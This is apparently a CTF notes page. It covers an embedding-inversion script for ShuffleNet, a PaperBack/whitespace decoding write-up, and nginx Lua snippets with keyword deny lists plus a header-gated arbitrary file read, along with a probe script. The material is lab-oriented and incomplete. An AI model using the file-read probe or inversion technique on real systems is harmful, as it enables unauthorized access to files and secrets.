```python
# Example usage
if __name__ == "__main__":
    xor_images('/Volumes/[C] Windows 11/Downloads/C!_Downloads_stream2.webp!stream1.webp',
               '/Volumes/[C] Windows 11/Downloads/stream2.webp',
               '/Users/kakeru/Downloads/a.png')
```
```python
import torch
from torchvision.models import shufflenet_v2_x1_0, ShuffleNet_V2_X1_0_Weights
from PIL import Image
import torchvision.transforms as transforms
import json

print("Step 1: Setting up the model and target embedding...")

# --- This part must EXACTLY match the server's setup ---
# 1.1 Load the same pre-trained model
model = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
model.fc = torch.nn.Identity()  # Turn it into a feature extractor
model.eval()                    # Set it to evaluation mode

# 1.2 The target embedding vector from the problem description
target_embedding_list = [0.01141324918717146, 0.05113353952765465, ..., 0.03890109062194824]  # Paste the full list here
target_embedding = torch.tensor(target_embedding_list, dtype=torch.float32).unsqueeze(0)

# --- Optimization Setup ---
# 2.1 Start with a random image (a tensor of random values).
# The model expects a 3-channel (RGB) image. Size doesn't matter too much; 224x224 is standard.
generated_image = torch.randn(1, 3, 224, 224, requires_grad=True)

# 2.2 Set up the optimizer. Adam is a good choice.
# It will update the pixels of `generated_image`.
optimizer = torch.optim.Adam([generated_image], lr=0.01)

# 2.3 Define the loss function (Mean Squared Error)
loss_fn = torch.nn.MSELoss()

print("\nStep 2: Starting the optimization process to generate the image...")

# --- The Main Loop ---
num_steps = 1000  # More steps can lead to better results
for i in range(num_steps):
    # 3.1 Get the embedding of our current generated image
    current_embedding = model(generated_image)

    # 3.2 Calculate the loss
    loss = loss_fn(current_embedding, target_embedding)

    # 3.3 Backpropagation
    optimizer.zero_grad()  # Clear previous gradients
    loss.backward()        # Calculate new gradients
    optimizer.step()       # Update the image pixels

    # 3.4 Clamp the image values to a valid range [0, 1]
    with torch.no_grad():
        generated_image.clamp_(0, 1)

    if (i + 1) % 100 == 0:
        print(f"Step {i+1}/{num_steps}, Loss: {loss.item():.10f}")

# --- Save the Result ---
print("\nStep 3: Saving the generated image to 'generated_image.png'...")

# Convert the final tensor to a PIL image and save it
final_image_tensor = generated_image.squeeze(0)
to_pil = transforms.ToPILImage()
final_image = to_pil(final_image_tensor)
final_image.save("generated_image.png")

print("✅ Done! Submit 'generated_image.png' to the server.")
```
PaperBack
This challenge was a lot of fun; I reproduced it by following a writeup.

Challenge description: Someone thought paper could replace a CD. Turns out… they weren't entirely wrong. Can you read between the dots? Btw, I really like OllyDbg.

Searching for PaperBack shows it is a scheme for storing data on paper, written by the author of OllyDbg, which explains the hint. Decoding the scanned image in the downloaded file yields a .ws file. Dropping it into CyberChef and converting to hex shows the file contains only four byte values: 20, 09, 0d, and 0a. Since 0d 0a is \r\n, replace those pairs with line breaks. The cleverest step comes next: ignore any 09 that appears on a line by itself, then map 20 to 0 and 09 to 1. One detail the writeup omitted: take only the last 8 bits of each line, because those are the bits that decode to meaningful characters.
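A minimal sketch of that decoding pipeline, assuming the decoded dump is saved locally as `flag.ws` (the filename is hypothetical; the lone-09 rule and the last-8-bits rule follow the steps above):

```python
# Decode the whitespace dump: 0x20 -> 0, 0x09 -> 1, lines split on \r\n.
with open("flag.ws", "rb") as f:  # hypothetical filename
    data = f.read()

chars = []
for line in data.split(b"\r\n"):
    if line == b"\x09":  # a lone 09 on its own line carries no data
        continue
    bits = "".join("0" if b == 0x20 else "1" for b in line if b in (0x20, 0x09))
    if len(bits) >= 8:
        chars.append(chr(int(bits[-8:], 2)))  # only the last 8 bits are meaningful

print("".join(chars))
```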
```nginx
location /download {
    access_by_lua_block {
        local blacklist = {"%.", "/", ";", "flag", "proc"}
        local args = ngx.req.get_uri_args()
        for k, v in pairs(args) do
            for _, b in ipairs(blacklist) do
                if string.find(v, b) then
                    ngx.exit(403)
                end
            end
        end
    }

    body_filter_by_lua_block {
        local blacklist = {"flag", "l3hsec", "l3hctf", "password", "secret", "confidential"}
        for _, b in ipairs(blacklist) do
            if string.find(ngx.arg[1], b) then
                ngx.arg[1] = string.rep("*", string.len(ngx.arg[1]))
            end
        end
    }
}
```
```nginx
location /read_anywhere {
    access_by_lua_block {
        if ngx.var.http_x_gateway_password ~= password then
            ngx.say("go find the password first!")
            ngx.exit(403)
        end
    }
    content_by_lua_block {
        local f = io.open(ngx.var.http_x_gateway_filename, "r")
        if not f then
            ngx.exit(404)
        end
```
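For reference, nginx exposes request headers as `$http_*` variables, so `ngx.var.http_x_gateway_password` corresponds to an `X-Gateway-Password` header and `ngx.var.http_x_gateway_filename` to `X-Gateway-Filename`. A rough probe sketch (the target URL, password, and file path are all placeholders):

```python
import requests

# Hypothetical target and password -- both must be filled in for real use.
resp = requests.get(
    "http://target/read_anywhere",
    headers={
        "X-Gateway-Password": "<password recovered elsewhere>",
        "X-Gateway-Filename": "/etc/hostname",  # placeholder: any readable file
    },
)
print(resp.status_code)
print(resp.text)
```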